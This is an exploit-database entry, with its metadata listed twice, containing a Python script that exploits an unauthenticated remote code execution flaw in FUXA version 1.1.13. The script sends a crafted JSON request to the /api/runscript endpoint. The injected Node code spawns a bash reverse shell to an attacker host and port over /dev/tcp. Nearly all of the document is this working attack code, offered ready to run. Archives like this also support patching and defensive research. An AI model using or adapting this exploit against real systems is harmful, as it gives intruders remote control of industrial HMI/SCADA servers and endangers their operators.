FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)
Author: Rodolfo Mariano
type: webapps
platform: typescript
port:
date_added: 2023-04-20
date_updated: 2023-04-20
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url:
raw file: 51385.txt
type: webapps
platform: typescript
port:
date_added: 2023-04-20
date_updated: 2023-04-20
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url:
raw file: 51385.txt
# Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution (RCE) # Date: 18/04/2023 # Exploit Author: Rodolfo Mariano # Vendor Homepage: https://github.com/frangoteam/FUXA # Version: FUXA V.1.1.13-1186 (current) from argparse import RawTextHelpFormatter import argparse, sys, threading, requests def main(rhost, rport, lhost, lport): url = "http://"+rhost+":"+rport+"/api/runscript" payload = { "headers": { "normalizedNames":{}, "lazyUpdate": "null" }, "params":{ "script":{ "parameters":[ { "name":"ok", "type":"tagid", "value":"" } ], "mode":"", "id":"", "test":"true", "name":"ok", "outputId":"", "code":"require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost,lport) } } } response = requests.post(url, json=payload) args = None parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python exploit.py --rhosts <ip> --rport <rport>--lport <port>") parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost') parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default=1881) parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost') parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport') args=parser.parse_args() main(args.rhost, args.rport, args.lhost, args.lport)
Copyright © 2024 Irfan TOOR all rights reserved.